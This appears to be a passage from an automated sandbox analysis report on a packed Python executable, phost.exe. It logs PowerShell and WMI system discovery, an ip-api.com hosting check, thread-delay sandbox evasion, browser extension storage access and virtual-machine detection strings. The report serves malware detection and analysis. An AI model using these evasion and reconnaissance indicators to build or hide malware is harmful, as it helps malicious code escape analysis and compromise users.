              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\tasklist.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wbem\WMIC.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\systeminfo.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\netsh.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\getmac.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              Source: global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Accept-Encoding: identity User-Agent: python-urllib3/2.2.3
              Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
              Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
              Source: C:\Windows\System32\getmac.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
              Source: C:\Windows\System32\getmac.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
              Source: C:\Windows\System32\getmac.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : ASSOCIATORS OF {Win32_NetworkAdapter.DeviceID="1"} WHERE ResultClass=Win32_NetworkAdapterConfiguration
              Source: C:\Windows\System32\getmac.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_NetworkAdapterSetting where Element="Win32_NetworkAdapter.DeviceID=\"1\""
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 (15 identical entries)
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8399
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1114
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8523
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 992
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6452
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3189
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1851
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 770
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6121
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2515
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3955
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5800
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1258
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3771
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 574
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2854
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1368
              Source: C:\Users\user\Desktop\phost.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32202\select.pyd
              Source: C:\Users\user\Desktop\phost.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32202\_ssl.pyd
              Source: C:\Users\user\Desktop\phost.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32202\_bz2.pyd
              Source: C:\Users\user\Desktop\phost.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32202\_decimal.pyd
              Source: C:\Users\user\Desktop\phost.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32202\_hashlib.pyd
              Source: C:\Users\user\Desktop\phost.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32202\_queue.pyd
              Source: C:\Users\user\Desktop\phost.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32202\_sqlite3.pyd
              Source: C:\Users\user\Desktop\phost.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32202\_ctypes.pyd
              Source: C:\Users\user\Desktop\phost.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32202\_lzma.pyd
              Source: C:\Users\user\Desktop\phost.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32202\unicodedata.pyd
              Source: C:\Users\user\Desktop\phost.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32202\_socket.pyd
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\jnxiphgt\jnxiphgt.dll
              Source: C:\Users\user\Desktop\phost.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32202\python312.dll
              Source: C:\Users\user\Desktop\phost.exe Check user administrative privileges: GetTokenInformation (graph_0-17382)
              Source: C:\Users\user\Desktop\phost.exe API coverage: 6.2 %
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7404 Thread sleep count: 8399 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7396 Thread sleep count: 1114 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7496 Thread sleep time: -9223372036854770s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7408 Thread sleep count: 8523 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7416 Thread sleep count: 992 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7500 Thread sleep time: -8301034833169293s >= -30000s
              Source: C:\Windows\System32\svchost.exe TID: 7704 Thread sleep time: -30000s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8120 Thread sleep count: 6452 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8124 Thread sleep count: 3189 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8168 Thread sleep time: -3689348814741908s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7396 Thread sleep count: 1851 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7512 Thread sleep time: -2767011611056431s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7412 Thread sleep count: 770 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7380 Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7544 Thread sleep count: 6121 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7436 Thread sleep count: 2515 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7592 Thread sleep time: -14757395258967632s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7968 Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2020 Thread sleep count: 3955 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2028 Thread sleep count: 285 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7568 Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7152 Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7548 Thread sleep count: 5800 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7548 Thread sleep count: 1258 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7836 Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7280 Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8016 Thread sleep count: 3771 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8016 Thread sleep count: 574 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7248 Thread sleep time: -2767011611056431s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7268 Thread sleep time: -2767011611056431s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7252 Thread sleep count: 2854 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7252 Thread sleep count: 1368 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7992 Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4284 Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
              Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
              Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
              Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct (2 entries)
              Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT TotalPhysicalMemory FROM Win32_ComputerSystem
              Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor (2 entries)
              Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor (2 entries)
              Source: C:\Windows\System32\conhost.exe Last function: Thread delayed (28 identical entries)
              Source: C:\Users\user\Desktop\phost.exe Code function: 0_2_00007FF62CC792F0 FindFirstFileExW,FindClose
              Source: C:\Users\user\Desktop\phost.exe Code function: 0_2_00007FF62CC783B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW
              Source: C:\Users\user\Desktop\phost.exe Code function: 0_2_00007FF62CC918E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose
              Source: C:\Users\user\Desktop\phost.exe Code function: 1_2_00007FF62CC792F0 FindFirstFileExW,FindClose
              Source: C:\Users\user\Desktop\phost.exe Code function: 1_2_00007FF62CC918E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exe Code function: 105_2_00007FF6BBCD46EC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exe Code function: 105_2_00007FF6BBCCE21C FindFirstFileW,FindClose,CreateFileW,DeviceIoControl,CloseHandle
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exe Code function: 105_2_00007FF6BBD188E0 FindFirstFileExA
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 (15 identical entries)
              Source: C:\Users\user\Desktop\phost.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js\
              Source: C:\Users\user\Desktop\phost.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\
              Source: C:\Users\user\Desktop\phost.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache\
              Source: C:\Users\user\Desktop\phost.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\
              Source: C:\Users\user\Desktop\phost.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\
              Source: C:\Users\user\Desktop\phost.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\
              Source: getmac.exe, 0000004D.00000002.1884181048.000001BC4BD03000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004D.00000003.1880936509.000001BC4BCDB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V
              Source: phost.exe, 00000001.00000003.1701309870.000001AE1D264000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vboxservice
              Source: phost.exe, 00000001.00000003.1701309870.000001AE1D264000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vmwareuser
              Source: getmac.exe, 0000004D.00000003.1881424686.000001BC4BD1E000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004D.00000003.1880936509.000001BC4BCDB000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004D.00000002.1884181048.000001BC4BD20000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SetPropValue.sSubKeyName("SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage");
              Source: getmac.exe, 0000004D.00000002.1884181048.000001BC4BD03000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004D.00000003.1880936509.000001BC4BCDB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: "SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage"
              Source: phost.exe, 00000001.00000003.1701309870.000001AE1D264000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 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
              Source: phost.exe, 00000001.00000003.1837339893.000001AE1D607000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.2171558185.000001AE1D600000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1702435717.000001AE1D5F8000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1702994368.000001AE1D630000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1703035642.000001AE1D608000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1857854012.000001AE1D607000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.2174353903.000001AE1D607000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1881310006.000001AE1D604000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2178106775.000001AE1D607000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1830725428.000001AE1D600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.2944454320.000001E22842B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
              Source: phost.exe, 00000001.00000003.1701309870.000001AE1D264000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vmsrvc
              Source: phost.exe, 00000001.00000002.2177632579.000001AE1D3A0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: fecodevmware
              Source: phost.exe, 00000001.00000002.2177632579.000001AE1D3A0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: f8vmusrvc
              Source: phost.exe, 00000001.00000002.2177632579.000001AE1D3A0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: d2qemu-ga
              Source: phost.exe, 00000001.00000003.1701309870.000001AE1D264000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vmwaretray
              Source: phost.exe, 00000001.00000003.1888003274.000001AE1D892000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1886265486.000001AE1D730000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.2170059092.000001AE1D721000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.2172658215.000001AE1D876000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2178359191.000001AE1D730000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
              Source: phost.exe, 00000001.00000002.2177632579.000001AE1D3A0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: fecodevmsrvc
              Source: getmac.exe, 0000004D.00000002.1884181048.000001BC4BD03000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004D.00000003.1880936509.000001BC4BCDB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Win32_NetworkProtocolHyper-V RAWHyper-VRAWHyper-V RAWrkProtocolRSVP
              Source: phost.exe, 00000001.00000002.2177632579.000001AE1D3A0000.00000004.00001000.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1701309870.000001AE1D264000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vboxtray
              Source: phost.exe, 00000001.00000002.2179183258.000001AE1DBF0000.00000004.00001000.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2177632579.000001AE1D3A0000.00000004.00001000.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1701309870.000001AE1D264000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: qemu-ga
              Source: phost.exe, 00000001.00000002.2177632579.000001AE1D3A0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vmware
              Source: getmac.exe, 0000004D.00000003.1881424686.000001BC4BD1E000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004D.00000003.1880936509.000001BC4BCDB000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004D.00000002.1884181048.000001BC4BD20000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: __PARAMETERSSYSTEM\CurrentControlSet\Services\Hyper-V\LinkageExport
              Source: phost.exe, 00000001.00000003.1701309870.000001AE1D264000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vmwareservicer_
              Source: phost.exe, 00000001.00000002.2179183258.000001AE1DBF0000.00000004.00001000.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2177632579.000001AE1D3A0000.00000004.00001000.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1701309870.000001AE1D264000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vmusrvc
              Source: phost.exe, 00000001.00000003.1701309870.000001AE1D264000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vmware)
              Source: getmac.exe, 0000004D.00000003.1881424686.000001BC4BD1E000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004D.00000003.1880936509.000001BC4BCDB000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004D.00000002.1884181048.000001BC4BD20000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage
              Source: phost.exe, 00000001.00000003.1701309870.000001AE1D264000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vmtoolsd
              Source: phost.exe, 00000001.00000002.2177632579.000001AE1D3A0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vmwareservice
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
